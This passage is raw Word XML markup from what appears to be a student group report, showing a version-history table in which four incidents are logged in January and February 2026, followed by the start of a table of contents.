              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="55" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="55" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="31EFC05F" w14:textId="1AAFF65B" w:rsidR="001D327F" w:rsidRPr="00CB4373" w:rsidRDefault="63B205A3" w:rsidP="001D327F">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2409" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000" w:themeColor="text1"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000" w:themeColor="text1"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="55" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="55" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0F381131" w14:textId="6D145ECE" w:rsidR="3C8C28D4" w:rsidRDefault="3C8C28D4" w:rsidP="6D133685">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:suppressLineNumbers w:val="0"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Member 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410"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6D2AC3C6" w14:textId="05D2671B" w:rsidR="001D327F" w:rsidRPr="00CB4373" w:rsidRDefault="5C33BDE2" w:rsidP="001D327F">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Added Incident #001</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C000BA" w:rsidRPr="004D5913" w14:paraId="25BEB2AB" w14:textId="77777777" w:rsidTr="3C8C28D4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2409" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000" w:themeColor="text1"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000" w:themeColor="text1"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="55" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="55" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="11CC209B" w14:textId="0576F144" w:rsidR="00C000BA" w:rsidRPr="00CB4373" w:rsidRDefault="28F96AAB" w:rsidP="001D327F">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>29</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:vertAlign w:val="superscript"/>
              </w:rPr>
              <w:t>th</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> January 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000" w:themeColor="text1"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000" w:themeColor="text1"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="55" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="55" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5F0B9187" w14:textId="26718A7D" w:rsidR="00C000BA" w:rsidRPr="00CB4373" w:rsidRDefault="63B205A3" w:rsidP="001D327F">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>0.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2409" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000" w:themeColor="text1"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000" w:themeColor="text1"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="55" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="55" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2E5B1A4B" w14:textId="0A674660" w:rsidR="3C8C28D4" w:rsidRDefault="3C8C28D4" w:rsidP="6D133685">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:suppressLineNumbers w:val="0"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Member 2 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410"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3D4BF339" w14:textId="1E494DA6" w:rsidR="00C000BA" w:rsidRPr="00CB4373" w:rsidRDefault="47B75D4E" w:rsidP="001D327F">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Added Incident #002</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C000BA" w:rsidRPr="004D5913" w14:paraId="1E64B1CA" w14:textId="77777777" w:rsidTr="3C8C28D4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2409" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000" w:themeColor="text1"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000" w:themeColor="text1"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="55" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="55" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4A4A5A62" w14:textId="51BD2586" w:rsidR="00C000BA" w:rsidRPr="00CB4373" w:rsidRDefault="28F96AAB" w:rsidP="001D327F">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>29</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:vertAlign w:val="superscript"/>
              </w:rPr>
              <w:t>th</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> January 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000" w:themeColor="text1"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000" w:themeColor="text1"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="55" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="55" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="217A4914" w14:textId="63DE443A" w:rsidR="00C000BA" w:rsidRPr="00CB4373" w:rsidRDefault="63B205A3" w:rsidP="001D327F">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>0.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2409" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000" w:themeColor="text1"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000" w:themeColor="text1"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="55" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="55" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7D602604" w14:textId="5A40D308" w:rsidR="3C8C28D4" w:rsidRDefault="5C33BDE2" w:rsidP="6D133685">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:suppressLineNumbers w:val="0"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Member 4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410"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510DEDB2" w14:textId="12D46F16" w:rsidR="00C000BA" w:rsidRPr="00CB4373" w:rsidRDefault="47B75D4E" w:rsidP="001D327F">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Added Incident #003</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0010538C" w:rsidRPr="004D5913" w14:paraId="65C145B4" w14:textId="77777777" w:rsidTr="3C8C28D4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2409" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000" w:themeColor="text1"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000" w:themeColor="text1"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="55" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="55" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="116006A9" w14:textId="7C706B98" w:rsidR="0010538C" w:rsidRPr="00CB4373" w:rsidRDefault="28F96AAB" w:rsidP="001D327F">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>29</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:vertAlign w:val="superscript"/>
              </w:rPr>
              <w:t>th</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> January 2026</w:t>
            </w:r>
            <w:commentRangeStart w:id="1"/>
          </w:p>
        </w:tc>
        <w:commentRangeEnd w:id="1"/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000" w:themeColor="text1"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000" w:themeColor="text1"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="55" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="55" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2BEC3E63" w14:textId="447A8265" w:rsidR="0010538C" w:rsidRPr="00CB4373" w:rsidRDefault="00CB4373" w:rsidP="001D327F">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CommentReference"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:commentReference w:id="1"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>0.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2409" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000" w:themeColor="text1"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000" w:themeColor="text1"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="55" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="55" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="23DD12E0" w14:textId="49F8B461" w:rsidR="3C8C28D4" w:rsidRDefault="3EAB24F4" w:rsidP="6D133685">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:suppressLineNumbers w:val="0"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Member 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410"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37A23B14" w14:textId="481A7216" w:rsidR="0010538C" w:rsidRPr="00CB4373" w:rsidRDefault="47B75D4E" w:rsidP="001D327F">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Added Incident #004</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="63B205A3" w14:paraId="0B788D61" w14:textId="77777777" w:rsidTr="63B205A3">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2409" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000" w:themeColor="text1"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000" w:themeColor="text1"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="55" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="55" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="15DC012E" w14:textId="37F55772" w:rsidR="63B205A3" w:rsidRDefault="29667AA3" w:rsidP="63B205A3">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:vertAlign w:val="superscript"/>
              </w:rPr>
              <w:t>nd</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> February 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000" w:themeColor="text1"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000" w:themeColor="text1"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="55" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="55" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7CC4246F" w14:textId="16AD683E" w:rsidR="63B205A3" w:rsidRDefault="63B205A3" w:rsidP="63B205A3">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2409" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000" w:themeColor="text1"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000" w:themeColor="text1"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="55" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="55" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0B374711" w14:textId="6EC13D57" w:rsidR="63B205A3" w:rsidRDefault="00E62E14" w:rsidP="63B205A3">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Member 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410"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051F9D02" w14:textId="0C0B55A1" w:rsidR="63B205A3" w:rsidRDefault="63B205A3" w:rsidP="63B205A3">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Final Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="429C099E" w14:textId="77777777" w:rsidR="004D5913" w:rsidRPr="004D5913" w:rsidRDefault="00AD4208" w:rsidP="004D5913">
      <w:pPr>
        <w:widowControl/>
        <w:overflowPunct/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:adjustRightInd/>
        <w:ind w:left="-709"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:i/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CF37F2" w14:textId="08470540" w:rsidR="008F3365" w:rsidRPr="008F3365" w:rsidRDefault="004D5913" w:rsidP="008F3365">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9182"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>TABLE OF CONTENTS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580F2612" w14:textId="233D18E1" w:rsidR="000603BD" w:rsidRDefault="1C075EAA">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9182"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG" w:eastAsia="en-SG"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText>TOC \o "1-3" \z \u \h</w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc220896675" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Declaration of Originality</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896675 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="58345DAC" w14:textId="053019DF" w:rsidR="000603BD" w:rsidRDefault="000603BD">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="480"/>
          <w:tab w:val="right" w:leader="dot" w:pos="9182"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG" w:eastAsia="en-SG"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc220896676" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
            <w:noProof/>
          </w:rPr>
          <w:t>1.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:noProof/>
            <w:kern w:val="2"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-SG" w:eastAsia="en-SG"/>
            <w14:ligatures w14:val="standardContextual"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Document Control</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896676 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6BFA8738" w14:textId="11927CCE" w:rsidR="000603BD" w:rsidRDefault="000603BD">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="480"/>
          <w:tab w:val="right" w:leader="dot" w:pos="9182"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG" w:eastAsia="en-SG"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc220896677" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>2.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:noProof/>
            <w:kern w:val="2"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-SG" w:eastAsia="en-SG"/>
